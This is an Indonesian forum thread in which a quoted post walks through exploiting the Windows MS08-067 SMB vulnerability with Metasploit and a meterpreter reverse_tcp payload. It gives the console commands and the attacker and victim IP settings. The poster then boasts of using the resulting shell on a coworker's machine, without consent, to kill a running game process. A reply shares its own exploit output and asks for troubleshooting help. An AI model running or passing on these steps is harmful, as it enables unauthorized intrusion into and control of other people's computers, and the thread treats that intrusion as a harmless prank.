02-07-2012, 11:48 AM
(01-24-2012, 03:29 PM)kuch1k1 Wrote: Permisi
si NEWBIE numpang post
maap yah om momod kalo ga bermanfaat, boleh di hapus aja
Ini sebenarnya terinspirasi dari ebooknya milik orang india
kayanya orang disni udah pada tau semua deh
tapi aku share aja siapa tau masih ada yang belom tau
disini aku ganti payloadnya pake meterpreter dan berhasil.
oke langsung aja ke tkp
Victim-nya om
Spoiler! :
Attacker : Backtrack 5 r1
buka console ketik
Code:#msfconsole
setelah terbukan metasploit consolenya langsung cari module netapi-nya ketik
Code:msf >search netapi
setelah ketemu langsung aja ketik seperti berikut ini
Code:use windows/smb/ms08_067_netapi
>set LHOST 192.168.0.126 <== IP Attacker
>set RHOST 192.168.0.115 <== IP Victim
>set payload windows/meterpreter/reverse_tcp
>exploit
Jika berhasil maka akan seperti berikut
setelah itu terserah deh om mau apain tuh targetSpoiler! :
kalo aku isengin temen satu kerjaan yang kerjaannya maen game terus
simpel aja cara buat isenginnya
Code:meterpreter >ps
maka akan tampil
langsung aku kill aja tuh game eco.exe nya dengan perintahSpoiler! :
Code:meterpreter >kill 2920
langsung DC tuh game
hehehhe
maap yah tmn ku abis maen game mulu sih
sekian yang bisa aku sampaikan
semoga bisa bermafaat
CMIIW
kok punya ku jawabannya gini ya?
msf exploit(ms08_067_netapi) > set RHOST 10.10.19.10
RHOST => 10.10.19.10
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 10.10.19.75:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Exploit completed, but no session was created.
msf exploit(ms08_067_netapi) >
mohon bantuannya yah
ada kodok teroret teroret dipinggir kali terorret teroret mencari makan teroret teroret setiap pagi teroret teroret
visit: http://warungiso.blogspot.com/
I was not smart or special but I was unix
visit: http://warungiso.blogspot.com/
I was not smart or special but I was unix